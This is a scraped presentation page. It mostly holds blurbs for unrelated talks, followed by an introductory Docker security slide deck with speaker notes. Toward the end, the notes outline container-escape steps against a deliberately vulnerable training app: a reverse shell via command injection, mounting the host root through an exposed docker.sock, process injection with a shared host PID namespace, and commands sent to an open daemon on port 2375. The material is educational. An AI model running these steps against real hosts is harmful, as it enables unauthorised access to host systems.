This presentation covers the basics of dockers, its security related features and how certain misconfigurations can be used to escape from container to host
A talk given at Docker London on Wednesday, July 20th, 2016. This talk is a fast-paced overview of the potential threats faced when containerizing applications, married to a quick run-through of the "security toolbox" available in the Docker engine via Linux kernel capabilities and features enabled by OCI's libcontainer/runc and Docker.
A video recording of this talk is available here: https://skillsmatter.com/skillscasts/8551-container-security
A talk given at Docker London on Wednesday, July 20th, 2016. This talk is a fast-paced overview of the potential threats faced when containerizing applications, married to a quick run-through of the "security toolbox" available in the Docker engine via Linux kernel capabilities and features enabled by OCI's libcontainer/runc and Docker.
A video recording of this talk is available here: https://skillsmatter.com/skillscasts/8551-container-security
Learn, Collaborate & Dockerize. Docker is an open platform that helps you build, ship and run applications anytime and anywhere.
Join Docker Jaipur:
Docker Page: events.docker.com/jaipur
Telegram Group: t.me/dockerjaipur
Twitter: @JaipurDocker
This slide is the speech provided by me for InfoSec2020 (https://2020.infosec.org.tw/) conference in Taiwan. It describes the container security, what issues is. how to exploit it and how to defense it.
Everyone heard about Kubernetes. Everyone wants to use this tool. However, sometimes we forget about security, which is essential throughout the container lifecycle.
Therefore, our journey with Kubernetes security should begin in the build stage when writing the code becomes the container image.
Kubernetes provides innate security advantages, and together with solid container protection, it will be invincible.
During the sessions, we will review all those features and highlight which are mandatory to use. We will discuss the main vulnerabilities which may cause compromising your system.
Contacts:
LinkedIn - https://www.linkedin.com/in/vshynkar/
GitHub - https://github.com/sqerison
-------------------------------------------------------------------------------------
Materials from the video:
The policies and docker files examples:
https://gist.github.com/sqerison/43365e30ee62298d9757deeab7643a90
The repo with the helm chart used in a demo:
https://github.com/sqerison/argo-rollouts-demo
Tools that showed in the last section:
https://github.com/armosec/kubescape
https://github.com/aquasecurity/kube-bench
https://github.com/controlplaneio/kubectl-kubesec
https://github.com/Shopify/kubeaudit#installation
https://github.com/eldadru/ksniff
Further learning.
A book released by CISA (Cybersecurity and Infrastructure Security Agency):
https://media.defense.gov/2021/Aug/03/2002820425/-1/-1/1/CTR_KUBERNETES%20HARDENING%20GUIDANCE.PDF
O`REILLY Kubernetes Security:
https://kubernetes-security.info/
O`REILLY Container Security:
https://info.aquasec.com/container-security-book
Thanks for watching!
***** DevOps Masters Program : https://www.edureka.co/masters-program/devops-engineer-training *****
This DevOps Docker Commands tutorial ( Docker Tutorial Blog Series: https://goo.gl/z93Ed1 ) will introduce you to the most commonly used Docker commands. The Hands-On session is performed on an Ubuntu-64 bit machine in which Docker is installed.
To learn how Docker can be used to integrate multiple DevOps tools, watch the video titled 'DevOps Tools', by clicking this link: https://goo.gl/up9iwd
Swarm in a nutshell
• Exposes several Docker Engines as a single virtual Engine
• Serves the standard Docker API
• Extremely easy to get started
• Batteries included but swappable
What is this Docker and Microservice thing that everyone is talking about? A primer to Docker and Microservice and how the two concepts complement each other.
Docker for the new Era: Introducing Docker,its components and toolsRamit Surana
Containers have been evolved from generations behind today.So what's new with Docker ? What has changed during the current scenario ? Find out more on docker and how to implement it in your environments in the above slide show.
Learn, Collaborate & Dockerize. Docker is an open platform that helps you build, ship and run applications anytime and anywhere.
Join Docker Jaipur:
Docker Page: events.docker.com/jaipur
Telegram Group: t.me/dockerjaipur
Twitter: @JaipurDocker
This slide is the speech provided by me for InfoSec2020 (https://2020.infosec.org.tw/) conference in Taiwan. It describes the container security, what issues is. how to exploit it and how to defense it.
Everyone heard about Kubernetes. Everyone wants to use this tool. However, sometimes we forget about security, which is essential throughout the container lifecycle.
Therefore, our journey with Kubernetes security should begin in the build stage when writing the code becomes the container image.
Kubernetes provides innate security advantages, and together with solid container protection, it will be invincible.
During the sessions, we will review all those features and highlight which are mandatory to use. We will discuss the main vulnerabilities which may cause compromising your system.
Contacts:
LinkedIn - https://www.linkedin.com/in/vshynkar/
GitHub - https://github.com/sqerison
-------------------------------------------------------------------------------------
Materials from the video:
The policies and docker files examples:
https://gist.github.com/sqerison/43365e30ee62298d9757deeab7643a90
The repo with the helm chart used in a demo:
https://github.com/sqerison/argo-rollouts-demo
Tools that showed in the last section:
https://github.com/armosec/kubescape
https://github.com/aquasecurity/kube-bench
https://github.com/controlplaneio/kubectl-kubesec
https://github.com/Shopify/kubeaudit#installation
https://github.com/eldadru/ksniff
Further learning.
A book released by CISA (Cybersecurity and Infrastructure Security Agency):
https://media.defense.gov/2021/Aug/03/2002820425/-1/-1/1/CTR_KUBERNETES%20HARDENING%20GUIDANCE.PDF
O`REILLY Kubernetes Security:
https://kubernetes-security.info/
O`REILLY Container Security:
https://info.aquasec.com/container-security-book
Thanks for watching!
***** DevOps Masters Program : https://www.edureka.co/masters-program/devops-engineer-training *****
This DevOps Docker Commands tutorial ( Docker Tutorial Blog Series: https://goo.gl/z93Ed1 ) will introduce you to the most commonly used Docker commands. The Hands-On session is performed on an Ubuntu-64 bit machine in which Docker is installed.
To learn how Docker can be used to integrate multiple DevOps tools, watch the video titled 'DevOps Tools', by clicking this link: https://goo.gl/up9iwd
Swarm in a nutshell
• Exposes several Docker Engines as a single virtual Engine
• Serves the standard Docker API
• Extremely easy to get started
• Batteries included but swappable
What is this Docker and Microservice thing that everyone is talking about? A primer to Docker and Microservice and how the two concepts complement each other.
Docker for the new Era: Introducing Docker,its components and toolsRamit Surana
Containers have been evolved from generations behind today.So what's new with Docker ? What has changed during the current scenario ? Find out more on docker and how to implement it in your environments in the above slide show.
Virtualization, Containers, Docker and scalable container management servicesabhishek chawla
In this presentation we take you through the concept of virtualization which includes the different types of virtualizations, understanding the Docker as a software containerization platform like Docker's Architecture, Building and running custom images in Docker containers, Scalable container management services which include overview of Amazon ECS & kubernetes and how at LimeTray we harnessed the power of kubernetes for scalable automated deployment of our microservices.
Presentation for introduction docker container concept and beginner of docker swarm
Finally, I'll demo monitor project with prometheus and show lab for any step.
Tell the history of Container/Docker/Kubernetes, and show the key elements of them.
After view this document, you could know the main feature of Container Docker and Kubernetes.
Very basic infomation about how these technique work together.
Docker introduction.
References : The Docker Book : Containerization is the new virtualization
http://www.amazon.in/Docker-Book-Containerization-new-virtualization-ebook/dp/B00LRROTI4/ref=sr_1_1?ie=UTF8&qid=1422003961&sr=8-1&keywords=docker+book
Dockerized containers are the current wave that promising to revolutionize IT. Everybody is talking about containers, but a lot of people remain confused on how they work and why they are different or better than virtual machines. In this session, Black Duck container and virtualization expert Tim Mackey will demystify containers, explain their core concepts, and compare and contrast them with the virtual machine architectures that have been the staple of IT for the last decade.
Introduction to automated environment management with Docker Containers - for...Lucas Jellema
(presented at the AMIS Platform SIG session on October 1st 2015, Nieuwegein, The Netherlands)
Creating and managing environments for development and r&d activities can be cumbersome. Quickly spinning up databases and web servers, using physical resources in a smart way, installing application components and having everything talk to each other can take a lot of time. This presentation introduces Docker - the key aspects of build, ship and run. It discusses the main concepts and typical actions.
Next, it takes you by the hand and introduces you to Vagrant and Virtual Box for quickly provisioning VMs in which Docker containers run platform components, applications and microservices - all environments fine tuned using Puppet and interacting with Git(Hub). We start from zero on your laptop and end with local environments in which to develop, test and run various types of applications.
The presentation spends some time on Oracle 's position regarding Docker and containers.
Orchestrating Linux Containers while tolerating failuresDocker, Inc.
lthough containers are bringing a refreshing flexibility when deploying services in production, the management of those containers in such an environment still requires special care in order to keep the application up and running. In this regard, orchestration platforms like Docker, Kubernetes and Nomad have been trying to alleviate this responsibility, facilitating the task of deploying and maintaining the entire application stack in its desired state. This ensures that a service will be always running, tolerating machine failures, network erratic behavior or software updates and downtime. The purpose of this talk is to explain the mechanisms and architecture of the Docker Engine orchestration platform (using a framework called swarmkit) to tolerate failures of services and machines, from cluster state replication and leader-election to container re-scheduling logic when a host goes down.
Search and Society: Reimagining Information Access for Radical FuturesBhaskar Mitra
The field of Information retrieval (IR) is currently undergoing a transformative shift, at least partly due to the emerging applications of generative AI to information access. In this talk, we will deliberate on the sociotechnical implications of generative AI for information access. We will argue that there is both a critical necessity and an exciting opportunity for the IR community to re-center our research agendas on societal needs while dismantling the artificial separation between the work on fairness, accountability, transparency, and ethics in IR and the rest of IR research. Instead of adopting a reactionary strategy of trying to mitigate potential social harms from emerging technologies, the community should aim to proactively set the research agenda for the kinds of systems we should build inspired by diverse explicitly stated sociotechnical imaginaries. The sociotechnical imaginaries that underpin the design and development of information access technologies needs to be explicitly articulated, and we need to develop theories of change in context of these diverse perspectives. Our guiding future imaginaries must be informed by other academic fields, such as democratic theory and critical theory, and should be co-developed with social science scholars, legal scholars, civil rights and social justice activists, and artists, among others.
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...DanBrown980551
Do you want to learn how to model and simulate an electrical network from scratch in under an hour?
Then welcome to this PowSyBl workshop, hosted by Rte, the French Transmission System Operator (TSO)!
During the webinar, you will discover the PowSyBl ecosystem as well as handle and study an electrical network through an interactive Python notebook.
PowSyBl is an open source project hosted by LF Energy, which offers a comprehensive set of features for electrical grid modelling and simulation. Among other advanced features, PowSyBl provides:
- A fully editable and extendable library for grid component modelling;
- Visualization tools to display your network;
- Grid simulation tools, such as power flows, security analyses (with or without remedial actions) and sensitivity analyses;
The framework is mostly written in Java, with a Python binding so that Python developers can access PowSyBl functionalities as well.
What you will learn during the webinar:
- For beginners: discover PowSyBl's functionalities through a quick general presentation and the notebook, without needing any expert coding skills;
- For advanced developers: master the skills to efficiently apply PowSyBl functionalities to your real-world scenarios.
Epistemic Interaction - tuning interfaces to provide information for AI supportAlan Dix
Paper presented at SYNERGY workshop at AVI 2024, Genoa, Italy. 3rd June 2024
https://alandix.com/academic/papers/synergy2024-epistemic/
As machine learning integrates deeper into human-computer interactions, the concept of epistemic interaction emerges, aiming to refine these interactions to enhance system adaptability. This approach encourages minor, intentional adjustments in user behaviour to enrich the data available for system learning. This paper introduces epistemic interaction within the context of human-system communication, illustrating how deliberate interaction design can improve system understanding and adaptation. Through concrete examples, we demonstrate the potential of epistemic interaction to significantly advance human-computer interaction by leveraging intuitive human communication strategies to inform system design and functionality, offering a novel pathway for enriching user-system engagements.
UiPath Test Automation using UiPath Test Suite series, part 4DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 4. In this session, we will cover Test Manager overview along with SAP heatmap.
The UiPath Test Manager overview with SAP heatmap webinar offers a concise yet comprehensive exploration of the role of a Test Manager within SAP environments, coupled with the utilization of heatmaps for effective testing strategies.
Participants will gain insights into the responsibilities, challenges, and best practices associated with test management in SAP projects. Additionally, the webinar delves into the significance of heatmaps as a visual aid for identifying testing priorities, areas of risk, and resource allocation within SAP landscapes. Through this session, attendees can expect to enhance their understanding of test management principles while learning practical approaches to optimize testing processes in SAP environments using heatmap visualization techniques
What will you get from this session?
1. Insights into SAP testing best practices
2. Heatmap utilization for testing
3. Optimization of testing processes
4. Demo
Topics covered:
Execution from the test manager
Orchestrator execution result
Defect reporting
SAP heatmap example with demo
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Jeffrey Haguewood
Sidekick Solutions uses Bonterra Impact Management (fka Social Solutions Apricot) and automation solutions to integrate data for business workflows.
We believe integration and automation are essential to user experience and the promise of efficient work through technology. Automation is the critical ingredient to realizing that full vision. We develop integration products and services for Bonterra Case Management software to support the deployment of automations for a variety of use cases.
This video focuses on the notifications, alerts, and approval requests using Slack for Bonterra Impact Management. The solutions covered in this webinar can also be deployed for Microsoft Teams.
Interested in deploying notification automations for Bonterra Impact Management? Contact us at sales@sidekicksolutionsllc.com to discuss next steps.
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualityInflectra
In this insightful webinar, Inflectra explores how artificial intelligence (AI) is transforming software development and testing. Discover how AI-powered tools are revolutionizing every stage of the software development lifecycle (SDLC), from design and prototyping to testing, deployment, and monitoring.
Learn about:
• The Future of Testing: How AI is shifting testing towards verification, analysis, and higher-level skills, while reducing repetitive tasks.
• Test Automation: How AI-powered test case generation, optimization, and self-healing tests are making testing more efficient and effective.
• Visual Testing: Explore the emerging capabilities of AI in visual testing and how it's set to revolutionize UI verification.
• Inflectra's AI Solutions: See demonstrations of Inflectra's cutting-edge AI tools like the ChatGPT plugin and Azure Open AI platform, designed to streamline your testing process.
Whether you're a developer, tester, or QA professional, this webinar will give you valuable insights into how AI is shaping the future of software delivery.
UiPath Test Automation using UiPath Test Suite series, part 3DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 3. In this session, we will cover desktop automation along with UI automation.
Topics covered:
UI automation Introduction,
UI automation Sample
Desktop automation flow
Pradeep Chinnala, Senior Consultant Automation Developer @WonderBotz and UiPath MVP
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
Let's dive deeper into the world of ODC! Ricardo Alves (OutSystems) will join us to tell all about the new Data Fabric. After that, Sezen de Bruijn (OutSystems) will get into the details on how to best design a sturdy architecture within ODC.
The Art of the Pitch: WordPress Relationships and SalesLaura Byrne
Clients don’t know what they don’t know. What web solutions are right for them? How does WordPress come into the picture? How do you make sure you understand scope and timeline? What do you do if sometime changes?
All these questions and more will be explored as we talk about matching clients’ needs with what your agency offers without pulling teeth or pulling your hair out. Practical tips, and strategies for successful relationship building that leads to closing the deal.
Accelerate your Kubernetes clusters with Varnish CachingThijs Feryn
A presentation about the usage and availability of Varnish on Kubernetes. This talk explores the capabilities of Varnish caching and shows how to use the Varnish Helm chart to deploy it to Kubernetes.
This presentation was delivered at K8SUG Singapore. See https://feryn.eu/presentations/accelerate-your-kubernetes-clusters-with-varnish-caching-k8sug-singapore-28-2024 for more details.
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
"Impact of front-end architecture on development cost", Viktor TurskyiFwdays
I have heard many times that architecture is not important for the front-end. Also, many times I have seen how developers implement features on the front-end just following the standard rules for a framework and think that this is enough to successfully launch the project, and then the project fails. How to prevent this and what approach to choose? I have launched dozens of complex projects and during the talk we will analyze which approaches have worked for me and which have not.
4. WHAT IS DOCKER
Docker is a tool designed to make it easier to create, deploy, and run applications
by using containers. Containers allow a developer to package up an application
with all of the parts it needs, such as libraries and other dependencies, and ship it
all out as one package.
• Docker is currently the only ecosystem providing the full package:
• Image management
• Resource Isolation
• File System Isolation
• Network Isolation
• Change Management
• Process Management
Source: https://medium.com/@yannmjl/what-is-docker-in-simple-english-a24e8136b90b
5. BASICS OF DOCKER
• Docker Engine is a client-server
application with these major
components:
• A CLI client (Docker)
• A REST API
• A server called the daemon
process
7. A BRIEF HISTORY OF CONTAINERS
1979
Unix V7
•During the development of Unix V7 in 1979, the chroot system call was introduced, changing the root
directory of a process and its children to a new location in the filesystem. This advance was the
beginning process isolation: segregating file access for each process. Chroot was added to BSD in 1982.
2000
FreeBSD Jails
•FreeBSD Jails allows administrators to partition a FreeBSD computer system into several independent,
smaller systems – called “jails” – with the ability to assign an IP address for each system and
configuration.
•Similar Jail was introduced in Linux VServer in 2001.
2004
Solaris Containers
•Combines system resource controls and boundary separation provided by zones, which were able to
leverage features like snapshots and cloning from ZFS.
Source: https://blog.aquasec.com/a-brief-history-of-containers-from-1970s-
chroot-to-docker-2016
8. A BRIEF HISTORY OF CONTAINERS [CONTD.]
2006
Process Containers
• It was designed for limiting, accounting and isolating resource usage (CPU, memory,
disk I/O, network) of a collection of processes. It was renamed “Control Groups
(cgroups)” a year later and eventually merged to Linux kernel 2.6.24.
2008
Linux Containers
• The most complete implementation of Linux container manager. It was implemented
using cgroups and Linux namespaces, and it works on a single Linux kernel without
requiring any patches.
2013
Docker
• Docker used LXC in its initial stages and later replaced that container manager with
its own library, libcontainer. But there’s no doubt that Docker separated itself from
the pack by offering an entire ecosystem for container management.
Source: https://blog.aquasec.com/a-brief-history-of-containers-from-1970s-
chroot-to-docker-2016
10. CONTAINER VS VIRTUAL MACHINES
Source: https://runnable.com/docker/why-use-docker
11. DOCKER ARCHITECTURE
• The Docker client - primary way that many Docker users interact with
Docker
• The Docker daemon - listens for Docker API requests and manages Docker
objects such as images, containers, networks, and volumes.
• Docker registries - A Docker registry stores Docker images. Eg: Docker Hub
and Docker Cloud
12. DOCKER ARCHITECTURE
• Docker objects
• Images - An image is a read-only template with instructions for creating
a Docker container. To build your own image, you create a Dockerfile.
• Containers - A container is a runnable instance of an image.
• Services - Services allow you to scale containers across multiple Docker
daemons, which all work together as a swarm with multiple managers
and workers. By default, the service is load-balanced across all worker
nodes.
13. DEMO – CREATING AND RUNNING DOCKER
CONTAINERS
DEMO 1 - CREATING MY FIRST DOCKER IMAGE
DEMO 2 - RUNNING MY FIRST DOCKER CONTAINER
14. BUILDING AND RUNNING DOCKER
CONTAINERS
• Create Dockerfile
• Build the Docker image – docker build .
• Turns Docker image to container – docker run <image-id>
• Other ways to run containers:
• Pull images from docker repo – docker pull <image-id>
• Run the image: docker run <image-id>
15. DOCKER INTERNALS AND FEATURES
• Namespaces
• Control Groups
• Security
• Capability
• SELinux
• seccomp
16. NAMESPACES
• Network Namespace – when containers are launched, a unique
network interface and IP address is created.
• docker run -it alpine ip addr show
• By changing the namespace to host, the container will share the same
network interface and IP address of the host machine
• docker run -it --net=host alpine ip addr show
• By changing the namespace to the host, the container can also see all
other system processes running on the operating system
• docker run -it --pid=host alpine ps aux
18. NAMESPACES
• By changing the
namespace to host, the
container will share the
same network interface
and IP address of the
host machine
• docker run -it --
net=host alpine ip addr
show
20. NAMESPACES
• By changing the
namespace to the
host, the container
can also see all other
system processes
running on the
operating system
• docker run -it --
pid=host alpine ps
aux
21. CGROUPS
• Control the resource utilization and keep a limit on the memory
CPUs etc.
• docker run -d --name wordpress --memory 100m alpine top
• This would allow up to 100mb to the wordpress container
• Similarly --cpu-shares can be used to set a cap on cpu
resource utilization
• docker stats --no-stream to verify the above implemented
configuration
23. CGROUPS
• Control the resource utilization and keep a limit on the memory
CPUs etc.
• docker run -d --name restricted-mem --memory 100m myfirstimage
• This would allow up to 100mb to the myfirstimage container
24. SECURITY: CAPABILITIES
• Ability of the kernel to break down root privileges is Capability.
• CAP_CHOWN – allows root user to make changes to file UIDs and GUIDs
• CAP_DAC_OVERRIDE – allows roots user to bypass kernel permission on
file read, write and execute
• CAP_NET_RAW – used by ping command
• Drop capabilities – CAP_NET_RAW
• sudo docker run --cap-drop NET_RAW -d -it ab0d83586b6e
• sudo docker exec -it <container-id> sh
25. SECURITY: CAPABILITIES
• Before Dropping capabilities – CAP_NET_RAW
• sudo docker run -d -it ab0d83586b6e
• sudo docker exec -it <container-id> sh
26. SECURITY: CAPABILITIES
• Drop capabilities – CAP_NET_RAW
• sudo docker run --cap-drop NET_RAW -d -it ab0d83586b6e
• sudo docker exec -it <container-id> sh
27. SECURITY: SECCOMP
• SecComp defines which system calls should and should not be
allowed to be executed by a container.
• They're defined in a JSON file that is applied when a container
starts.
28. SECURITY: SECCOMP
• In this initial step we've
defined seccomp permissions
to disable allowing containers
to run chmod, chown and
chown32.
• Create json formatted file for
defining seccomp policies
34. DOCKER COMMAND CHEAT SHEET FOR
ADMINS AND PENTESTERS
• service dockerd start – starts Docker daemon service
• docker ps – lists all running containers
• docker ps -a – lists all containers that have been stopped, running, created, etc
• docker run -name <container-name> -it <image-name>:<tag> /bin/bash – take an interactive tty shell inside a
container
• docker log -f <container-name> - inspect docker logs
• docker inspect <container-name> or <image-name> -
• docker history <container-name> - lists changes done on the image
• docker network ls
• docker build <dir> .
• docker login
• docker secret ls
• docker commit c3f279d17e0a svendowideit/testimage:version3
35. NEXT TOPICS TO COVER
• Container Orchestration platform – Kubernetes and its
(In)Security
36. REFERENCES AND FURTHER READING
• Attack demos inspired from Madhu Akulas’ workshop from
defcon
• https://www.katacoda.com
• https://docker.com
• http://docker-saigon.github.io/post/Docker-Internals/
Editor's Notes
How many of you have heard this from developers? Quite a lot right? So this is essentially one of the most important challenges that containers solve for us. So using docker you can simply create a compact runtime environment for your application to run without worrying about the dependencies on your host.
The idea of containers is very old. Dating back to 1979. A chroot jail is a way to isolate a process and its children from the rest of the system.
The idea is that you create a directory tree where you copy or link in all the system files needed for a process to run. You then use the chroot() system call to change the root directory to be at the base of this new tree and start the process running in that chroot'd environment.
Process containers in 2006 was designed for limiting, accounting and isolating resource usage. It was renamed Control groups(cgroups)
You can think of a vm as a self contained computer packed in a single file but something needs to be able to run that file. Thats where the hypervisor comes into play.
Guest OS. For eg: you want to run 3 applications on an isolation. You will need to spin up 3 Guest OS. The problem here is that each guest os would need min 700MB ram. So 3 applications running in an isolation would require a min of 2.1GB of resources + CPU power + HD space + each resource would need its own set of binaries and libraries for it to run. … A lot of resources wasted. So what docker helps, you is in just having the essential libraries and binaries required to run the application. So you would have around 100-200 MB of a base image, 10 MB of your code and 50MB of RAM
Now lets compare that to docker containers – here we have a docker daemon instead of a hypervisor. The docker daemon is a service that runs on the background on your host os and manages everything required to run and interact with docker containers. Next we have our bin/libs just like we do on our VMs. But instead of them being run on a guest os, they get built into special packages called docker images, then the docker daemon runs those images. Then we have the applications that would be run and managed independently by docker daemon. Typically each application and its dependencies get packed into the same docker image and each application is isolated.
ps -ef --forest
-v what it is trying to do is mapping the unix socket of the docker to inside a container. CI/CD pipelines used container pipelines to run jobs. So what they do is rather than giving host access, they perform docker in docker. Which means that they will run your code inside a docker environment which is already running inside a docker
What makes containers possible. What makes it possible to run a process in isolation. And without an overhead of boointng an os. Answwer to that lies in linux kernel which offers us these features that makes it possible to run these processes in isolation and sandboxed environment.
File stystem namespace. Each container can have its own OS/filesystem. Each container can have its own network namespace and have its own ip address and interface. Each container can have its own hostname. A new security feature has been added where we can have a user namespace. Earlier if you were a root user inside the container, if you could breakout of the container, you could gain root access on the system but its no more possible because you can map it to a non-root user on the system even if you breakout of the container.
So that’s what makes running processes in isolation possible.
UnionFS
Union file systems, or UnionFS, are file systems that operate by creating layers, making them very lightweight and fast. Docker Engine uses UnionFS to provide the building blocks for containers. Docker Engine can use multiple UnionFS variants, including AUFS, btrfs, vfs, and DeviceMapper.
Namespaces
Docker uses a technology called namespaces to provide the isolated workspace called the container. When you run a container, Docker creates a set of namespaces for that container.
These namespaces provide a layer of isolation. Each aspect of a container runs in a separate namespace and its access is limited to that namespace.
These are running in a vm but appear to run in isolation because these are namespaces. What you have inside a container is a list of namespaces or pid for your own process itself and that gets mapped to certain pids on the host system. Inside containers the pids are 1,2,3,4 they are actually mapped to the process on the host
There are other namespaces which make it look like running a vm and that’s what isolates one container from another.
Namespaces
Docker uses a technology called namespaces to provide the isolated workspace called the container. When you run a container, Docker creates a set of namespaces for that container.
These namespaces provide a layer of isolation. Each aspect of a container runs in a separate namespace and its access is limited to that namespace.
These are running in a vm but appear to run in isolation because these are namespaces. What you have inside a container is a list of namespaces or pid for your own process itself and that gets mapped to certain pids on the host system. Inside containers the pids are 1,2,3,4 they are actually mapped to the process on the host
There are other namespaces which make it look like running a vm and that’s what isolates one container from another.
Namespaces
Docker uses a technology called namespaces to provide the isolated workspace called the container. When you run a container, Docker creates a set of namespaces for that container.
These namespaces provide a layer of isolation. Each aspect of a container runs in a separate namespace and its access is limited to that namespace.
These are running in a vm but appear to run in isolation because these are namespaces. What you have inside a container is a list of namespaces or pid for your own process itself and that gets mapped to certain pids on the host system. Inside containers the pids are 1,2,3,4 they are actually mapped to the process on the host
There are other namespaces which make it look like running a vm and that’s what isolates one container from another.
Namespaces
Docker uses a technology called namespaces to provide the isolated workspace called the container. When you run a container, Docker creates a set of namespaces for that container.
These namespaces provide a layer of isolation. Each aspect of a container runs in a separate namespace and its access is limited to that namespace.
These are running in a vm but appear to run in isolation because these are namespaces. What you have inside a container is a list of namespaces or pid for your own process itself and that gets mapped to certain pids on the host system. Inside containers the pids are 1,2,3,4 they are actually mapped to the process on the host
There are other namespaces which make it look like running a vm and that’s what isolates one container from another.
Namespaces
Docker uses a technology called namespaces to provide the isolated workspace called the container. When you run a container, Docker creates a set of namespaces for that container.
These namespaces provide a layer of isolation. Each aspect of a container runs in a separate namespace and its access is limited to that namespace.
These are running in a vm but appear to run in isolation because these are namespaces. What you have inside a container is a list of namespaces or pid for your own process itself and that gets mapped to certain pids on the host system. Inside containers the pids are 1,2,3,4 they are actually mapped to the process on the host
There are other namespaces which make it look like running a vm and that’s what isolates one container from another.
Control groups
Now when these processes are run in isolation, and run multiple containers on the same host, there is a possibility that there is a container that has a memory leak for eg: it would affect the rest of the system / containers.
This is where cgroups come into play. What control groups allow you to do is control as the name says. Control the resource utilization and keep a limit on the memory CPUs etc.
Cgroups are also used for monitoring the containers
Control groups
Now when these processes are run in isolation, and run multiple containers on the same host, there is a possibility that there is a container that has a memory leak for eg: it would affect the rest of the system / containers.
This is where cgroups come into play. What control groups allow you to do is control as the name says. Control the resource utilization and keep a limit on the memory CPUs etc.
Cgroups are also used for monitoring the containers
Control groups
Now when these processes are run in isolation, and run multiple containers on the same host, there is a possibility that there is a container that has a memory leak for eg: it would affect the rest of the system / containers.
This is where cgroups come into play. What control groups allow you to do is control as the name says. Control the resource utilization and keep a limit on the memory CPUs etc.
Cgroups are also used for monitoring the containers
This Breaking down of root privileges into granular capabilities allows you to:
Remove individual capabilities from the root user account, making it less powerful/dangerous.
Add privileges to non-root users at a very granular level.
By default, Docker drops all capabilities except those needed, using a whitelist approach.
Lets take an example if you want to perform logging of containers. This would require your
In each node of your cluster, you should have an agent running to make sure logs are coming into the system. To gather information from the container namespace, they need to have this visibility. These logging tools require additionacl privileges than your normal containers.
So this attack will on abusing such capabilities.
One such capability is sys_ptrace which allows to trace the host process. Going ahead we assume that we have a shell access on the container. And we will try break out of it.
This Breaking down of root privileges into granular capabilities allows you to:
Remove individual capabilities from the root user account, making it less powerful/dangerous.
Add privileges to non-root users at a very granular level.
By default, Docker drops all capabilities except those needed, using a whitelist approach.
Lets take an example if you want to perform logging of containers. This would require your
In each node of your cluster, you should have an agent running to make sure logs are coming into the system. To gather information from the container namespace, they need to have this visibility. These logging tools require additionacl privileges than your normal containers.
So this attack will on abusing such capabilities.
One such capability is sys_ptrace which allows to trace the host process. Going ahead we assume that we have a shell access on the container. And we will try break out of it.
This Breaking down of root privileges into granular capabilities allows you to:
Remove individual capabilities from the root user account, making it less powerful/dangerous.
Add privileges to non-root users at a very granular level.
By default, Docker drops all capabilities except those needed, using a whitelist approach.
Lets take an example if you want to perform logging of containers. This would require your
In each node of your cluster, you should have an agent running to make sure logs are coming into the system. To gather information from the container namespace, they need to have this visibility. These logging tools require additionacl privileges than your normal containers.
So this attack will on abusing such capabilities.
One such capability is sys_ptrace which allows to trace the host process. Going ahead we assume that we have a shell access on the container. And we will try break out of it.
We assume that we already have a shell inside the container with a web application vulnerability or an insider who administers one of the containers.
We assume there is a command injection vulnerability, application used is DVNA by appseco
We get a reverse shell
We upload docker binary
Check if docker.sock exists in /var/run/docker.sock
Run another container which is volume mounted on the host ./docker run -i -v /:/host debian:jessie /bin/bash
Change the root directory to /host - chroot /host
cat /etc/hostname – we see that we can read files from host
We assume that we already have a shell inside the container with a web application vulnerability or an insider who administers one of the containers.
We assume that we have access to a container with a web application vulnerability and this container runs in privileged mode with pid of the host shared with the container for debugging purposes by the developer.
So if we see ps aux we can see the host system processes and we need to inject our payload on one of the process. But how will we know that which process is of host and container?
cat /proc/444/cgroup
find /proc/*/cgroup -type f -print -exec cat {} \; | grep docker -B4
We perform process injection in this case because we can view processes on the host as well as have all privileges to do debugging.
Nmap –p2375
If port 2375 is open for you on a network pentest, then there is a high possibility that it is docker daemon service.
You can try docker -H 1.1.1.1:2375 ps to run commands on the host